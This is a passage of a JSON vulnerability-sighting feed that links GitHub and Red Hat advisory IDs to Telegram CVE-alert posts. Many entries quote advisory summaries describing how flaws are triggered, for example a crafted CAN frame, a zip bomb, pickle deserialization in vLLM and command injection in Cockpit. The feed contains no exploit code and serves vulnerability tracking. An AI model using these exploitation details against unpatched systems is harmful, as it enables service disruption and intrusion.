"4845da41-aa9e-4ff7-9d08-524098e75036", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-HX5V-J59Q-C3J8", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/14865", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2022-2741\n\ud83d\udd25 CVSS Score: 8.2 (cvssV3_1, Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:H)\n\ud83d\udd39 Description: The denial-of-service can be triggered by transmitting a carefully crafted CAN frame on the same CAN network as the vulnerable node. The frame must have a CAN ID matching an installed filter in the vulnerable node (this can easily be guessed based on CAN traffic analyses). The frame must contain the opposite RTR bit as what the filter installed in the vulnerable node contains (if the filter matches RTR frames, the frame must be a data frame or vice versa).\n\ud83d\udccf Published: 2022-10-31T17:45:09.741Z\n\ud83d\udccf Modified: 2025-05-05T14:06:07.171Z\n\ud83d\udd17 References:\n1. https://github.com/zephyrproject-rtos/zephyr/security/advisories/GHSA-hx5v-j59q-c3j8", "creation_timestamp": "2025-05-05T14:20:35.000000Z"}, {"uuid": "9437e595-08c2-42f3-9294-42edee432c5e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-458G-Q4FH-MJ6R", "type": "published-proof-of-concept", "source": "Telegram/99IlCP_IS9qBv42yzAhiUHqlKgiNRb4WP8dx5pH1uskzhuw", "content": "", "creation_timestamp": "2026-04-17T17:30:37.000000Z"}, {"uuid": "0ea76109-9ed9-434d-b572-da08f4e07ac7", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-PJ97-4P9W-GX3Q", "type": "published-proof-of-concept", "source": "Telegram/99IlCP_IS9qBv42yzAhiUHqlKgiNRb4WP8dx5pH1uskzhuw", "content": "", "creation_timestamp": "2026-04-17T17:30:37.000000Z"}, {"uuid": "c8e2b6c0-47a8-4fa7-b9cc-9a9c2c257987", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-96HH-8HX5-CPW7", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/14947", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2024-51991\n\ud83d\udd25 CVSS Score: 1.1 (cvssV4_0, Vector: CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:P/VC:N/VI:N/VA:N/SC:L/SI:L/SA:N/E:U)\n\ud83d\udd39 Description: October is a Content Management System (CMS) and web platform. A vulnerability in versions prior to 3.7.5 affects authenticated administrators with sites that have the `media.clean_vectors` configuration enabled. This configuration will sanitize SVG files uploaded using the media manager. This vulnerability allows an authenticated user to bypass this protection by uploading it with a permitted extension (for example, .jpg or .png) and later modifying it to the .svg extension. This vulnerability assumes a trusted user will attack another trusted user and cannot be actively exploited without access to the administration panel and interaction from the other user. This issue has been patched in v3.7.5.\n\ud83d\udccf Published: 2025-05-05T17:04:53.615Z\n\ud83d\udccf Modified: 2025-05-05T18:06:18.685Z\n\ud83d\udd17 References:\n1. https://github.com/octobercms/october/security/advisories/GHSA-96hh-8hx5-cpw7", "creation_timestamp": "2025-05-05T18:19:32.000000Z"}, {"uuid": "220494f8-0b48-4efc-9540-91ba4d7471d5", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-WXM3-64FX-CMX9", "type": "seen", "source": "Telegram/bhyT7i4V2BArCJwfUMt9o2_rqwfY7TKMJyzxFMsGDU3QsWI", "content": "", "creation_timestamp": "2026-04-17T17:31:16.000000Z"}, {"uuid": "f69b474d-0dc5-4664-afec-dc007b53fb8e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-WHJ4-6X5X-4V2J", "type": "seen", "source": "Telegram/bhyT7i4V2BArCJwfUMt9o2_rqwfY7TKMJyzxFMsGDU3QsWI", "content": "", "creation_timestamp": "2026-04-17T17:31:16.000000Z"}, {"uuid": "274bb9d9-8177-42e1-8d3e-5f1d9de600b6", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-63XR-GVJV-R6XV", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/15456", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2025-46826\n\ud83d\udd25 CVSS Score: 1.3 (cvssV4_0, Vector: CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N/E:U/S:N/AU:Y/R:A/V:D/RE:L)\n\ud83d\udd39 Description: insa-auth is an authentication server for INSA Rouen. A minor issue allowed third-party websites to access the server's secondary authentication bridge, potentially revealing basic student information (name and number). However, the issue posed minimal risk, was never exploited, and had limited impact. A fix was implemented promptly on May 3, 2025.\n\ud83d\udccf Published: 2025-05-07T21:32:30.865Z\n\ud83d\udccf Modified: 2025-05-07T21:32:30.865Z\n\ud83d\udd17 References:\n1. https://github.com/INSAgenda/insa-auth/security/advisories/GHSA-63xr-gvjv-r6xv\n2. https://github.com/INSAgenda/insa-auth/commit/8c1e68b2fb55aa952f522ead55a6587526982a2c\n3. https://github.com/INSAgenda/insa-auth/commit/b0e7508e6ca4360e39fb1fd931f8d47b1f992ced\n4. https://github.com/INSAgenda/insa-auth/commit/c77cf2e25778f83ebf5c4fdb4ded3ffcc8cfd74d", "creation_timestamp": "2025-05-07T22:23:16.000000Z"}, {"uuid": "46e108d3-79c4-44ff-a1aa-5a6d6fed646b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-CWJ7-6V67-2CM4", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/15197", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2025-46820\n\ud83d\udd25 CVSS Score: 7.1 (cvssV3_1, Vector: CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:L/I:H/A:H)\n\ud83d\udd39 Description: phpgt/Dom provides access to modern DOM APIs. Versions of phpgt/Dom prior to 4.1.8 expose the GITHUB_TOKEN in the Dom workflow run artifact. The ci.yml workflow file uses actions/upload-artifact@v4 to upload the build artifact. This artifact is a zip of the current directory, which includes the automatically generated .git/config file containing the run's GITHUB_TOKEN. Seeing as the artifact can be downloaded prior to the end of the workflow, there is a few seconds where an attacker can extract the token from the artifact and use it with the GitHub API to push malicious code or rewrite release commits in your repository. Any downstream user of the repository may be affected, but the token should only be valid for the duration of the workflow run, limiting the time during which exploitation could occur. Version 4.1.8 fixes the issue.\n\ud83d\udccf Published: 2025-05-06T18:48:52.176Z\n\ud83d\udccf Modified: 2025-05-06T19:02:09.024Z\n\ud83d\udd17 References:\n1. https://github.com/phpgt/Dom/security/advisories/GHSA-cwj7-6v67-2cm4\n2. https://github.com/phpgt/Dom/commit/205cddcc82c002dfa48e874494efbf4c49497394", "creation_timestamp": "2025-05-06T19:21:12.000000Z"}, {"uuid": "8d9587ba-89a5-4fdb-a552-8bd37ea5f10c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-5835-4GVC-32PC", "type": "seen", "source": "Telegram/bhyT7i4V2BArCJwfUMt9o2_rqwfY7TKMJyzxFMsGDU3QsWI", "content": "", "creation_timestamp": "2026-04-17T17:31:16.000000Z"}, {"uuid": "8f0a8b89-ffae-407a-acc1-93964202a261", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-C5VG-26P8-Q8CR", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/14981", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2025-46730\n\ud83d\udd25 CVSS Score: 6.8 (cvssV3_1, Vector: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:N/I:N/A:H)\n\ud83d\udd39 Description: MobSF is a mobile application security testing tool used. Typically, MobSF is deployed on centralized internal or cloud-based servers that also host other security tools and web applications. Access to the MobSF web interface is often granted to internal security teams, audit teams, and external vendors.  MobSF provides a feature that allows users to upload ZIP files for static analysis. Upon upload, these ZIP files are automatically extracted and stored within the MobSF directory. However, in versions up to and including 4.3.2, this functionality lacks a check on the total uncompressed size of the ZIP file, making it vulnerable to a ZIP of Death (zip bomb) attack. Due to the absence of safeguards against oversized extractions, an attacker can craft a specially prepared ZIP file that is small in compressed form but expands to a massive size upon extraction. Exploiting this, an attacker can exhaust the server's disk space, leading to a complete denial of service (DoS) not just for MobSF, but also for any other applications or websites hosted on the same server. This vulnerability can lead to complete server disruption in an organization which can affect other internal portals and tools too (which are hosted on the same server). If some organization has created their customized cloud based mobile security tool using MobSF core then an attacker can exploit this vulnerability to crash their servers. Commit 6987a946485a795f4fd38cebdb4860b368a1995d fixes this issue. As an additional mitigation, it is recommended to implement a safeguard that checks the total uncompressed size of any uploaded ZIP file before extraction. If the estimated uncompressed size exceeds a safe threshold (e.g., 100 MB), MobSF should reject the file and notify the user.\n\ud83d\udccf Published: 2025-05-05T19:32:24.170Z\n\ud83d\udccf Modified: 2025-05-05T20:04:30.184Z\n\ud83d\udd17 References:\n1. https://github.com/MobSF/Mobile-Security-Framework-MobSF/security/advisories/GHSA-c5vg-26p8-q8cr\n2. https://github.com/MobSF/Mobile-Security-Framework-MobSF/commit/6987a946485a795f4fd38cebdb4860b368a1995d", "creation_timestamp": "2025-05-05T20:20:06.000000Z"}, {"uuid": "848cbfd7-9f3b-4567-9aa2-f605de69ec9b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-4G8M-5MJ5-C8XG", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/15163", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2025-46736\n\ud83d\udd25 CVSS Score: 5.3 (cvssV3_1, Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N)\n\ud83d\udd39 Description: Umbraco is a free and open source .NET content management system. Prior to versions 10.8.10 and 13.8.1, based on an analysis of the timing of post login API responses, it's possible to determine whether an account exists. The issue is patched in versions 10.8.10 and 13.8.1. No known workarounds are available.\n\ud83d\udccf Published: 2025-05-06T17:08:23.503Z\n\ud83d\udccf Modified: 2025-05-06T17:08:23.503Z\n\ud83d\udd17 References:\n1. https://github.com/umbraco/Umbraco-CMS/security/advisories/GHSA-4g8m-5mj5-c8xg\n2. https://github.com/umbraco/Umbraco-CMS/commit/14fbd20665b453cbf094ccf4575b79a9fba07e03\n3. https://github.com/umbraco/Umbraco-CMS/commit/34709be6cce9752dfa767dffbf551305f48839bc", "creation_timestamp": "2025-05-06T17:21:41.000000Z"}, {"uuid": "a74d9ff1-ef2f-49ea-9e8e-d64586ee71d3", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-V3H7-C287-PFG9", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/14982", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2025-46813\n\ud83d\udd25 CVSS Score: 5.8 (cvssV3_1, Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:N/A:N)\n\ud83d\udd39 Description: Discourse is an open-source community platform. A data leak vulnerability affects sites deployed between commits 10df7fdee060d44accdee7679d66d778d1136510 and 82d84af6b0efbd9fa2aeec3e91ce7be1a768511b. On login-required sites, the leak meant that some content on the site's homepage could be visible to unauthenticated users. Only login-required sites that got deployed during this timeframe are affected, roughly between April 30 2025 noon EDT and May 2 2025, noon EDT. Sites on the stable branch are unaffected. Private content on an instance's homepage could be visible to unauthenticated users on login-required sites. Versions of 3.5.0.beta4 after commit 82d84af6b0efbd9fa2aeec3e91ce7be1a768511b are not vulnerable to the issue. No workarounds are available. Sites must upgrade to a non-vulnerable version of Discourse.\n\ud83d\udccf Published: 2025-05-05T20:03:46.289Z\n\ud83d\udccf Modified: 2025-05-05T20:03:46.289Z\n\ud83d\udd17 References:\n1. https://github.com/discourse/discourse/security/advisories/GHSA-v3h7-c287-pfg9\n2. https://github.com/discourse/discourse/commit/10df7fdee060d44accdee7679d66d778d1136510\n3. https://github.com/discourse/discourse/commit/82d84af6b0efbd9fa2aeec3e91ce7be1a768511b", "creation_timestamp": "2025-05-05T20:20:07.000000Z"}, {"uuid": "f19c1c91-4aee-4294-8a87-d6e8093690a4", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-9PCC-GVX5-R5WM", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/15182", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2025-30165\n\ud83d\udd25 CVSS Score: 8 (cvssV3_1, Vector: CVSS:3.1/AV:A/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H)\n\ud83d\udd39 Description: vLLM is an inference and serving engine for large language models. In a multi-node vLLM deployment using the V0 engine, vLLM uses ZeroMQ for some multi-node communication purposes. The secondary vLLM hosts open a `SUB` ZeroMQ socket and connect to an `XPUB` socket on the primary vLLM host. When data is received on this `SUB` socket, it is deserialized with `pickle`. This is unsafe, as it can be abused to execute code on a remote machine. Since the vulnerability exists in a client that connects to the primary vLLM host, this vulnerability serves as an escalation point. If the primary vLLM host is compromised, this vulnerability could be used to compromise the rest of the hosts in the vLLM deployment. Attackers could also use other means to exploit the vulnerability without requiring access to the primary vLLM host. One example would be the use of ARP cache poisoning to redirect traffic to a malicious endpoint used to deliver a payload with arbitrary code to execute on the target machine. Note that this issue only affects the V0 engine, which has been off by default since v0.8.0. Further, the issue only applies to a deployment using tensor parallelism across multiple hosts, which we do not expect to be a common deployment pattern. Since V0 is has been off by default since v0.8.0 and the fix is fairly invasive, the maintainers of vLLM have decided not to fix this issue. Instead, the maintainers recommend that users ensure their environment is on a secure network in case this pattern is in use. The V1 engine is not affected by this issue.\n\ud83d\udccf Published: 2025-05-06T16:53:52.836Z\n\ud83d\udccf Modified: 2025-05-06T17:26:58.974Z\n\ud83d\udd17 References:\n1. https://github.com/vllm-project/vllm/security/advisories/GHSA-9pcc-gvx5-r5wm\n2. https://github.com/vllm-project/vllm/blob/c21b99b91241409c2fdf9f3f8c542e8748b317be/vllm/distributed/device_communicators/shm_broadcast.py#L295-L301\n3. https://github.com/vllm-project/vllm/blob/c21b99b91241409c2fdf9f3f8c542e8748b317be/vllm/distributed/device_communicators/shm_broadcast.py#L468-L470", "creation_timestamp": "2025-05-06T18:21:38.000000Z"}, {"uuid": "a2e3f07f-15f4-475c-90cd-3e1e4574ec8f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-6PVM-V73P-P6M9", "type": "published-proof-of-concept", "source": "Telegram/nSRvyMMuDO4LVDIhC_Rx7gx27JwRYoRyOv-3439P5STagmw", "content": "", "creation_timestamp": "2026-04-17T23:20:07.000000Z"}, {"uuid": "92c0aad2-c70a-42a8-ad3b-787905df7ae0", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-666R-V2M7-XGP9", "type": "published-proof-of-concept", "source": "Telegram/nSRvyMMuDO4LVDIhC_Rx7gx27JwRYoRyOv-3439P5STagmw", "content": "", "creation_timestamp": "2026-04-17T23:20:07.000000Z"}, {"uuid": "86128c0e-703a-417b-aece-56e3232ccd92", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-FV6V-VW8H-9X79", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/15183", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2025-32022\n\ud83d\udd25 CVSS Score: 4.6 (cvssV3_1, Vector: CVSS:3.1/AV:L/AC:H/PR:H/UI:R/S:U/C:N/I:H/A:L)\n\ud83d\udd39 Description: Finit provides fast init for Linux systems. Finit's urandom plugin has a heap buffer overwrite vulnerability at boot which leads to it overwriting other parts of the heap, possibly causing random instabilities and undefined behavior. The urandom plugin is enabled by default, so this bug affects everyone using Finit 4.2 or later that do not explicitly disable the plugin at build time. This bug is fixed in Finit 4.12. Those who cannot upgrade or backport the fix to urandom.c are strongly recommended to disable the plugin in the call to the `configure` script.\n\ud83d\udccf Published: 2025-05-06T16:57:30.855Z\n\ud83d\udccf Modified: 2025-05-06T17:22:16.925Z\n\ud83d\udd17 References:\n1. https://github.com/troglobit/finit/security/advisories/GHSA-fv6v-vw8h-9x79\n2. https://github.com/troglobit/finit/commit/3feff37ba51fa0a6a0a06f59682a0918aa5b04de", "creation_timestamp": "2025-05-06T18:21:39.000000Z"}, {"uuid": "366dbdec-dcca-4692-8abd-cfb5a7f0d0a9", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-XR54-GX74-FGHG", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/15314", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2024-47619\n\ud83d\udd25 CVSS Score: 7.5 (cvssV3_1, Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N)\n\ud83d\udd39 Description: syslog-ng is an enhanced log daemo. Prior to version 4.8.2, `tls_wildcard_match()` matches on certificates such as `foo.*.bar` although that is not allowed. It is also possible to pass partial wildcards such as `foo.a*c.bar` which glib matches but should be avoided / invalidated. This issue could have an impact on TLS connections, such as in man-in-the-middle situations. Version 4.8.2 contains a fix for the issue.\n\ud83d\udccf Published: 2025-05-07T15:12:02.118Z\n\ud83d\udccf Modified: 2025-05-07T15:12:02.118Z\n\ud83d\udd17 References:\n1. https://github.com/syslog-ng/syslog-ng/security/advisories/GHSA-xr54-gx74-fghg\n2. https://github.com/syslog-ng/syslog-ng/commit/dadfdbecde5bfe710b0a6ee5699f96926b3f9006\n3. https://github.com/syslog-ng/syslog-ng/blob/b0ccc8952d333fbc2d97e51fddc0b569a15e7a7d/lib/transport/tls-verifier.c#L78-L110\n4. https://github.com/syslog-ng/syslog-ng/releases/tag/syslog-ng-4.8.2", "creation_timestamp": "2025-05-07T15:22:27.000000Z"}, {"uuid": "7bf2ba31-3e10-4909-9d9d-205fb96fb91d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:3667", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/19594", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2024-2947\n\ud83d\udd25 CVSS Score: 7.3 (cvssV3_1, Vector: CVSS:3.1/AV:L/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:H)\n\ud83d\udd39 Description: A flaw was found in Cockpit. Deleting a sosreport with a crafted name via the Cockpit web interface can lead to a command injection vulnerability, resulting in privilege escalation. This issue affects Cockpit versions 270 and newer.\n\ud83d\udccf Published: 2024-03-28T18:31:59.249Z\n\ud83d\udccf Modified: 2025-06-26T13:39:28.332Z\n\ud83d\udd17 References:\n1. https://access.redhat.com/errata/RHSA-2024:3667\n2. https://access.redhat.com/errata/RHSA-2024:3843\n3. https://access.redhat.com/security/cve/CVE-2024-2947\n4. https://bugzilla.redhat.com/show_bug.cgi?id=2271614", "creation_timestamp": "2025-06-26T13:50:56.000000Z"}, {"uuid": "e41e3be0-725c-41ba-85a4-9002bd9900c0", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-4VGF-2CM4-MP7C", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/15218", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2025-46735\n\ud83d\udd25 CVSS Score: 1.1 (cvssV4_0, Vector: CVSS:4.0/AV:L/AC:L/AT:N/PR:H/UI:A/VC:N/VI:N/VA:N/SC:H/SI:H/SA:H/E:U)\n\ud83d\udd39 Description: Terraform WinDNS Provider allows users to manage their Windows DNS server resources through Terraform. A security issue has been found in Terraform WinDNS Provider before version `1.0.5`. The `windns_record` resource did not sanitize the input variables. This could lead to authenticated command injection in the underlyding powershell command prompt. Version 1.0.5 contains a fix for the issue.\n\ud83d\udccf Published: 2025-05-06T17:00:33.902Z\n\ud83d\udccf Modified: 2025-05-06T19:48:41.206Z\n\ud83d\udd17 References:\n1. https://github.com/nrkno/terraform-provider-windns/security/advisories/GHSA-4vgf-2cm4-mp7c\n2. https://github.com/nrkno/terraform-provider-windns/commit/c76f69610c1b502f90aaed8c4f102194530b5bce", "creation_timestamp": "2025-05-06T20:21:22.000000Z"}, {"uuid": "a1c7b348-e51f-420c-9480-96a9f849c0ba", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:3843", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/19594", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2024-2947\n\ud83d\udd25 CVSS Score: 7.3 (cvssV3_1, Vector: CVSS:3.1/AV:L/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:H)\n\ud83d\udd39 Description: A flaw was found in Cockpit. Deleting a sosreport with a crafted name via the Cockpit web interface can lead to a command injection vulnerability, resulting in privilege escalation. This issue affects Cockpit versions 270 and newer.\n\ud83d\udccf Published: 2024-03-28T18:31:59.249Z\n\ud83d\udccf Modified: 2025-06-26T13:39:28.332Z\n\ud83d\udd17 References:\n1. https://access.redhat.com/errata/RHSA-2024:3667\n2. https://access.redhat.com/errata/RHSA-2024:3843\n3. https://access.redhat.com/security/cve/CVE-2024-2947\n4. https://bugzilla.redhat.com/show_bug.cgi?id=2271614", "creation_timestamp": "2025-06-26T13:50:56.000000Z"}, {"uuid": "f5efbf28-9d89-4c43-97c6-ee9c372be08c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2025:4439", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/14823", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2025-32906\n\ud83d\udd25 CVSS Score: 7.5 (cvssV3_1, Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H)\n\ud83d\udd39 Description: A flaw was found in libsoup, where the soup_headers_parse_request() function may be vulnerable to an out-of-bound read. This flaw allows a malicious user to use a specially crafted HTTP request to crash the HTTP server.\n\ud83d\udccf Published: 2025-04-14T13:58:39.718Z\n\ud83d\udccf Modified: 2025-05-05T01:17:58.750Z\n\ud83d\udd17 References:\n1. https://access.redhat.com/errata/RHSA-2025:4439\n2. https://access.redhat.com/security/cve/CVE-2025-32906\n3. https://bugzilla.redhat.com/show_bug.cgi?id=2359341", "creation_timestamp": "2025-05-05T02:18:59.000000Z"}, {"uuid": "f47790c6-85c3-454f-aa96-6692eee14216", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-265R-HFXG-FHMG", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/14813", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2024-40635\n\ud83d\udd25 CVSS Score: 4.6 (cvssV3_1, Vector: CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:C/C:L/I:L/A:N)\n\ud83d\udd39 Description: containerd is an open-source container runtime. A bug was found in containerd prior to versions 1.6.38, 1.7.27, and 2.0.4 where containers launched with a User set as a `UID:GID` larger than the maximum 32-bit signed integer can cause an overflow condition where the container ultimately runs as root (UID 0). This could cause unexpected behavior for environments that require containers to run as a non-root user. This bug has been fixed in containerd 1.6.38, 1.7.27, and 2.04. As a workaround, ensure that only trusted images are used and that only trusted users have permissions to import images.\n\ud83d\udccf Published: 2025-03-17T21:32:37.894Z\n\ud83d\udccf Modified: 2025-05-04T22:02:39.748Z\n\ud83d\udd17 References:\n1. https://github.com/containerd/containerd/security/advisories/GHSA-265r-hfxg-fhmg\n2. https://github.com/containerd/containerd/commit/05044ec0a9a75232cad458027ca83437aae3f4da\n3. https://github.com/containerd/containerd/commit/1a43cb6a1035441f9aca8f5666a9b3ef9e70ab20\n4. https://github.com/containerd/containerd/commit/cf158e884cfe4812a6c371b59e4ea9bc4c46e51a", "creation_timestamp": "2025-05-04T22:18:50.000000Z"}, {"uuid": "eb94fbf1-e20d-4f6f-8061-778a418e1b8a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-MFPR-9886-XJHG", "type": "seen", "source": "Telegram/1afGr9vW06Zk0J3YeUW4MdlUf8TA53EPyuLeVgpLZqfvxp8", "content": "", "creation_timestamp": "2026-04-17T21:22:32.000000Z"}, {"uuid": "5ec40ddf-1114-46a2-a4b3-246f3489279e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-6CRX-4G37-7J49", "type": "seen", "source": "Telegram/1afGr9vW06Zk0J3YeUW4MdlUf8TA53EPyuLeVgpLZqfvxp8", "content": "", "creation_timestamp": "2026-04-17T21:22:32.000000Z"}, {"uuid": "20f73f31-b36c-4b45-be55-39b93f62db33", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-PX83-72RX-V57C", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/15020", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2025-46728\n\ud83d\udd25 CVSS Score: 7.5 (cvssV3_1, Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H)\n\ud83d\udd39 Description: cpp-httplib is a C++ header-only HTTP/HTTPS server and client library. Prior to version 0.20.1, the library fails to enforce configured size limits on incoming request bodies when `Transfer-Encoding: chunked` is used or when no `Content-Length` header is provided. A remote attacker can send a chunked request without the terminating zero-length chunk, causing uncontrolled memory allocation on the server. This leads to potential exhaustion of system memory and results in a server crash or unresponsiveness. Version 0.20.1 fixes the issue by enforcing limits during parsing. If the limit is exceeded at any point during reading, the connection is terminated immediately. A short-term workaround through a Reverse Proxy is available. If updating the library immediately is not feasible, deploy a reverse proxy (e.g., Nginx, HAProxy) in front of the `cpp-httplib` application. Configure the proxy to enforce maximum request body size limits, thereby stopping excessively large requests before they reach the vulnerable library code.\n\ud83d\udccf Published: 2025-05-06T00:45:25.130Z\n\ud83d\udccf Modified: 2025-05-06T00:45:25.130Z\n\ud83d\udd17 References:\n1. https://github.com/yhirose/cpp-httplib/security/advisories/GHSA-px83-72rx-v57c\n2. https://github.com/yhirose/cpp-httplib/commit/7b752106ac42bd5b907793950d9125a0972c8e8e", "creation_timestamp": "2025-05-06T01:20:33.000000Z"}, {"uuid": "95478a4d-489a-429b-a752-330a8f6cb93d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-J2JM-C596-C5Q3", "type": "seen", "source": "Telegram/o-uTgZiWLI4DGr-3Qx2v6r5S9u58WJIjtqdTFR62kB0PIWs", "content": "", "creation_timestamp": "2026-04-17T21:22:46.000000Z"}, {"uuid": "7a6c1340-a85f-48d0-b608-812675565e47", 